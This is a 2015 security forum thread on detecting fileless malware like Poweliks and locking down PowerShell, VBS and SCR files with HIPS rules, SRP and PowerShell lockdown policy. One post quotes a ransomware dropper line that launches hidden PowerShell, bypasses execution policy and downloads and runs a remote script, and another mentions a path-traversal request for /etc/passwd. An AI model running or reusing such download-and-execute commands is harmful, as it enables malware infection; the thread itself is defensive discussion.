In memory fileless malwar edetection ..... any antimalware software?

Discussion in 'malware problems & news' started by aigle, Sep 10, 2015.

  1. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    I have a question for security experts here, esp the experts directly related to a commercial security software. Is there any antimalware that can detect in memory fileless malware like bedep, proactively or on the basis of signatures.

    No antimalware scanner scans memory in real time( BOClean was an exception) and most HIPS are blind to the fileless malware injection, so I guess the answer is: None.
     
  2. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    2,509
    Location:
    Slovakia
  3. Techwiz

    Techwiz Registered Member

    Joined:
    Jan 5, 2012
    Posts:
    539
    Location:
    United States
    Just started learning about powershell commands yesterday, but I thought I'd add in case anyone didn't know that powershell.exe is merely an interface. Blocking access to it will not prevent attackers from exploiting this resource on a secure system. Thanks for sharing this, as this isn't an attack vector that I have a lot of experience with. The whitepaper was informative.
     
  4. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    2,509
    Location:
    Slovakia
    If you uninstall it, it can not be used. I can not use powershell scripts because of that. Removing those directories should do the trick as well.

    C:\Program Files (x86)\WindowsPowerShell
    C:\Program Files\WindowsPowerShell
    C:\Windows\Sysnative\WindowsPowerShell
    C:\Windows\SysWOW64\WindowsPowerShell
     
    Last edited: Sep 11, 2015
  5. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Excerpt from the Symantec article:

    It uses the PowerShell program along with an embedded PowerShell script to load a DLL into memory which serves as a “Watchdog” to ensure that Poweliks remains installed on the compromised computer.

    So monitoring PowerShell usage using a HIPS rule for example to monitor its start up will detect Powerliks activity. It is not recommended that PowerShell be removed since certain Microsoft utilities like "Fix-it" plus various OS diagnostics use Powershell. Also creating HIPS rules to monitor registry keys Powerliks uses is recommended.







     
  6. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,461
    Oh jeeze, that is an ugly slideshow...

    @itman

    From my reading of the PDF, it looks like the zero-day exploit is used to escalate privileges and invoke the bad executable, in one stroke; which may mean that it could at least theoretically fool a HIPS.

    BTW: I seriously recommend everyone take a look at that exploit, it's a really embarrassing one. It's like vulnerabilities in ancient UNIX web servers... you know, "GET /../../../../../../../etc/passwd". That kind of thing. Except in this case, it seems to be running an EXE with admin privileges instead. Yay!
     
  7. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    855
    Could you explain this further? Do you know what method CryptoPrevent uses to block access to powershell?
     
  8. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Depends on the HIPS and the way you set it up. Some HIPS have options like "allow all signed processes" for example. If the malware is signed and that option enabled then yes, you're screwed.

    I use Eset's HIPS and it doesn't care about privileges and the like, it will stop system processes or malware equally from target process access. In other words, I have to set rules for anything I want to allow modification to a defined target process.
     
  9. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    I don't believe that CryptoPrevent blocks access to PowerShell. Rather it blocks write/execute access to known directories where crypto malware downloads to. It allows protects user directories like My Documents, My Pictures, etc. from being encrypted.
     
  10. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Found this over at bleepingcomputer.com. Great example of a malicious use of PowerShell via a .vbs script execution. What the code is doing is opening Powershell in hidden mode and overriding its default policy not to allow script execution. Again PowerShell has to start to execute this script. So a HIPS rule to monitor it's start up would prevent this infection.

    El-Polocker is distributed through fake DHL penalty notices that contain a link to a zip file hosted on DropBox that contains a VBS file called Penalty.vbs. If this file is run it will download and execute a PowerShell script that is the main component of the El-Polocker ransomware.

    Set oShell =CreateObject("Shell.Application")

    oShell.ShellExecute"powershell","-WindowStyle Hidden -sta -executionpolicy bypass if (1 -eq 1){IEX ((New-Object Net.WebClient).DownloadString('http://193.xxx.xxx.xxx/wall/encrypt.ps1'));}","","",1

    Once the PowerShell script is launched it will inject the C:\1\Reflect.dll into Explorer.exe using a script from PowerSploit[/b] and then executes the DLL’s VoidFunc function.

    Ref.
    http://www.bleepingcomputer.com/for...hicken-as-it-encrypts-your-drives-and-shares/
     
  11. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    2,509
    Location:
    Slovakia
    So disabling vbs will do as well, it is even simpler and it can be done only temporary (no restart necessary), until vbs is needed.
     
  12. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    One other item that needs mentioning. Besides what I mentioned previously about it not being advisable to delete the default version Powershell in the Windows sub-directory, it will not protect you from its use. There are malware in existence that will actually download Powershell if they detect it is not installed.

    Additionally, there are multiple versions of Powershell besides the default version installed by the OS. So you really want your HIPS rule to alert you for the start up of any .exe located in the Powershell Windows sub-directory.
     
  13. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    Way more importantly than detecting a malware already in-memory is not allowing it to run in the first place.

    If the malware is running than your security is poorly implemented, and once a computer has been compromised it cannot be trusted anymore, unless the harddrive has been "zeroed" and all firmware verified to be legit (like BIOS, router firmware, etc)..

    EMET 5.2 (max settings) + Sanboxie + Comodo Firewall/HIPS/Sandbox + malwarebytesPRO + non-admin account + a good AV engine (like avira's)
    should stop nearly any malware from execyuting.
     
  14. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,085
    Would VBS and PS1 set in designated file types in SRP stop it?
     
  15. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    One thing that could be done using SRP would be to set Powershell to run only under admin privileges. Assuming that you are running as default limited admin and you have UAC set to the highest level, you will least get a UAC prompt when Powershell tries to execute. This is only valid if the malware is not an exploit and has already elevated privileges.

    VBS scripts are a different issue since many processes use them. Actually a lot of malware like I posted above will drop a .vbs script in the registry startup areas. This way it can escape detection by a lot of AVs by running when the system boots. What I have done is created a HIPS rule to monitor wscript.exe creating/modifying any startup registry keys. Many HIPS's already have default rules to monitor modification of registry startup keys. Also most behavior blockers will detect a malware process attempting to modify registry areas.

    And then there are python scripts ................................ :eek:
     
  16. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,085
    I tried to run VBS and PS1 from non white-listed location and it got blocked by SRP. Since those files can't be dropped to white-listed location without UAC prompt, this should be fine.
    I use SRP for all users and disable it when needed.
     
  17. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    I believe also .ps*1 where * can be "d", "m", etc. are also valid PowerShell extensions.

    -EDIT-
    Also, Powershell has to run from one of these directories in WIN 7 for example due to .dlls, etc. needed C:\Windows\System32\WindowsPowerShell\v1.0 or C:\Windows\SysWOW64\WindowsPowerShell\v1.0.

    Finally to test PowerShell SRP policy you need to set execution policy to something other than the default restricted value: https://technet.microsoft.com/en-us/library/hh849812.aspx. In restricted mode, all script execution is blocked. Make sure you set it back to restricted mode after testing.
     
    Last edited: Sep 15, 2015
  18. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Here's another way to harness PowerShell if your using WIN 8. Take note of the text I highlighted in red.

    -EDIT- You can download and run Powershell v3 on WIN 7 SP1. You need both Windows Management Framework 3.0 and .Net Framework 4.

    PowerShell v3 PSLockdownPolicy


    In PowerShell v3 a feature that was added was the __PSLockDownPolicy environment variable which allows to control of object types that can be used and created in PowerShell. This is used by Windows 8 RT to lockdown the PowerShell environment. Sadly Microsoft has not documented or made any information publicly available officially on the levels that can be set and what each of the levels can do. This does not stop us from using it. When used the constraint mode will block most post exploitation scripts and commands I have seen in publicly available toolkits so I would recommend it as an extra lockdown step you can take for your hosts that use PowerShell v3. Now do take in to consideration that this will also block some module and legitimate scripts to run so do test and be careful.

    To use this we can create a new group policy and choose in it Computer Configuration –> Preferences –> Windows Settings –> Environment

    https://static.squarespace.com/static/52ad1d91e4b00a98a27ba20e/52ae5168e4b0988b43f4361f/52ae5169e4b0988b43f43a3d/1363831659293/Windows-Live-Writer-68b73afd7c9c_11515-

    Create a new entry for an Environment Variable and set it to Update so if not created it will and if it has another value it will change it back. Set it to __PSLockdownpolicy and set the value to 4

    https://static.squarespace.com/static/52ad1d91e4b00a98a27ba20e/52ae5168e4b0988b43f4361f/52ae5169e4b0988b43f43a3f/1363831660075/Windows-Live-Writer-68b73afd7c9c_11515-

    You can click on OK and then apply then link the policy to any OU you want and use WMI filters to control on which host it is applied on. Now you should use this in conjunction with WMI filters so as to target only those systems where you have deployed PowerShell v3. Again like with AppLocker and SRP if the user is able to run PowerShell with Administrative privileges he may be able to change the variable value for he current session by passing the control, but it will more than likely block most automated tools out there. Thanks to Matt Graeber for recommending the use of the variable and helping me test what scenarios it would apply to.
     
    Last edited: Sep 15, 2015
  19. Mister X

    Mister X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    1,774
    Location:
    Mexico
    I use AppGuard which has memory protection.
     
  20. Kobayashi maru

    Kobayashi maru Registered Member

    Joined:
    Nov 7, 2009
    Posts:
    124
    Location:
    Drivin' all night my hands wet on the wheel....
    Even so called file-less memory loaded images need permission to do anything. I don't see what the fuss is about
     
  21. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,461
    @Kobayashi maru

    In this case, only the persistence mechanism is file-less. So yeah, kind of a misnomer. File-less delivery would be another matter.
     
  22. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Here's another extension that is a favorite for crypto malware:

    The .SCR extension can be given to .EXE files to detour any restrictions placed on EXE files by antivirus programs or malware.
    And someone over at Spiceworks that came up with a solution using SRP:

    To do this I created one path rule for *.scr files, with Security Level of Disallowed, and then another for %SystemRoot%\System32\*.scr with Security Level of Unrestricted, and this does exactly what I need.
    If your OS is x64, then you would also want to add an unrestricted rule for the SysWOW64 directory.
     
  23. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,085
    Thanks. I already have SCR blacklisted and also most other executable and dangerous file extensions. I usually follow this guide, when setting up SRP: http://www.mechbgon.com/srp/
     
  24. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    855
    I looked again and you're right. It was bcedit.exe I was thinking of re: Cryptoprevent.
     
  25. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    2,969
    Location:
    U.S.A.
    Personally I prefer use of HIPS over SRP. With an "ask" HIPS rule, I will get an alert plus option to allow or deny. This way, software installers that use AppData directories for example aren't "borked." Flashplayer updates for example will run a .exe from the AppData directory.
     
Loading...